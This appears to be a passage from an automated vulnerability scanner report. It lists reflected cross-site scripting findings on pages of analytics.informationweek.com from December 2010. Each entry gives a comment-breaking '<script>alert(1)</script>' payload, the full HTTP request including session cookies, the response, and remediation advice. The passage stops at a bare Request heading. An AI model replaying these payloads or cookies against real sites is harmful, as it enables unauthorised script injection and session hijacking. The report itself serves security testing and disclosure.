GET /menu86fdb--><script>alert(1)</script>525303269e0/25/Virtualization/Virtualization.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:10 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:10 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... onweek.com%2Fmenu86fdb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E525303269e0%2F25%2FVirtualization%2FVirtualization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu86fdb--><script>alert(1)</script>525303269e0/25/Virtualization/Virtualization.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 754ea--><script>alert(1)</script>75c80d2dc03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25754ea--><script>alert(1)</script>75c80d2dc03/Virtualization/Virtualization.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:21 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:21 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eek.com%2Fmenu%2F25754ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E75c80d2dc03%2FVirtualization%2FVirtualization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25754ea--><script>alert(1)</script>75c80d2dc03/Virtualization/Virtualization.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload c7bf7--><script>alert(1)</script>bda4b5fc76c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25/Virtualizationc7bf7--><script>alert(1)</script>bda4b5fc76c/Virtualization.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:34 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:35 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F25%2FVirtualizationc7bf7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebda4b5fc76c%2FVirtualization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25/Virtualizationc7bf7--><script>alert(1)</script>bda4b5fc76c/Virtualization.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload b89df--><script>alert(1)</script>f19f7b9ea68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25/Virtualization/Virtualization.htmlb89df--><script>alert(1)</script>f19f7b9ea68 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:44 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:44 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... n%2FVirtualization.htmlb89df--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef19f7b9ea68&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.htmlb89df--><script>alert(1)</script>f19f7b9ea68"> ...[SNIP]...
3.120. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/25/Virtualization/Virtualization.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cf3d0--><script>alert(1)</script>502191a651d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25/Virtualization/Virtualization.html?cf3d0--><script>alert(1)</script>502191a651d=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ualization.html%3Fcf3d0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E502191a651d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html?cf3d0--><script>alert(1)</script>502191a651d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8b8ac--><script>alert(1)</script>f567cd8b359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu8b8ac--><script>alert(1)</script>f567cd8b359/5/Cloud-computing/Cloud-computing.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:50 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:50 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenu8b8ac--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef567cd8b359%2F5%2FCloud-computing%2FCloud-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu8b8ac--><script>alert(1)</script>f567cd8b359/5/Cloud-computing/Cloud-computing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2de8a--><script>alert(1)</script>954aea6cb45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/52de8a--><script>alert(1)</script>954aea6cb45/Cloud-computing/Cloud-computing.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:59 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:59 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eek.com%2Fmenu%2F52de8a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E954aea6cb45%2FCloud-computing%2FCloud-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/52de8a--><script>alert(1)</script>954aea6cb45/Cloud-computing/Cloud-computing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 69059--><script>alert(1)</script>b91529cd1fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/5/Cloud-computing69059--><script>alert(1)</script>b91529cd1fc/Cloud-computing.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:06 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:06 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F5%2FCloud-computing69059--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb91529cd1fc%2FCloud-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/5/Cloud-computing69059--><script>alert(1)</script>b91529cd1fc/Cloud-computing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload bd15c--><script>alert(1)</script>fde2a4d4446 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/5/Cloud-computing/Cloud-computing.htmlbd15c--><script>alert(1)</script>fde2a4d4446 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:11 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:11 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FCloud-computing.htmlbd15c--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efde2a4d4446&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.htmlbd15c--><script>alert(1)</script>fde2a4d4446"> ...[SNIP]...
3.125. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/5/Cloud-computing/Cloud-computing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4fcd7--><script>alert(1)</script>93ce3681f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/5/Cloud-computing/Cloud-computing.html?4fcd7--><script>alert(1)</script>93ce3681f9c=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... computing.html%3F4fcd7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E93ce3681f9c%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html?4fcd7--><script>alert(1)</script>93ce3681f9c=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ec85--><script>alert(1)</script>95d6bed190e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu4ec85--><script>alert(1)</script>95d6bed190e/6/Data-center/Data-center.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:44:54 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:54 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenu4ec85--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E95d6bed190e%2F6%2FData-center%2FData-center.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu4ec85--><script>alert(1)</script>95d6bed190e/6/Data-center/Data-center.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload acd84--><script>alert(1)</script>2bca18b689e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6acd84--><script>alert(1)</script>2bca18b689e/Data-center/Data-center.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:05 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:05 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rmationweek.com%2Fmenu%2F6acd84--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2bca18b689e%2FData-center%2FData-center.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6acd84--><script>alert(1)</script>2bca18b689e/Data-center/Data-center.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f6a66--><script>alert(1)</script>055e09556d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6/Data-centerf6a66--><script>alert(1)</script>055e09556d3/Data-center.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:14 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:14 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... com%2Fmenu%2F6%2FData-centerf6a66--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E055e09556d3%2FData-center.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6/Data-centerf6a66--><script>alert(1)</script>055e09556d3/Data-center.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7d1b6--><script>alert(1)</script>13b07e66f14 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6/Data-center/Data-center.html7d1b6--><script>alert(1)</script>13b07e66f14 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:26 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:29 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Data-center%2FData-center.html7d1b6--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E13b07e66f14&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6/Data-center/Data-center.html7d1b6--><script>alert(1)</script>13b07e66f14"> ...[SNIP]...
3.130. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/6/Data-center/Data-center.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b2ddb--><script>alert(1)</script>59b4ad09867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
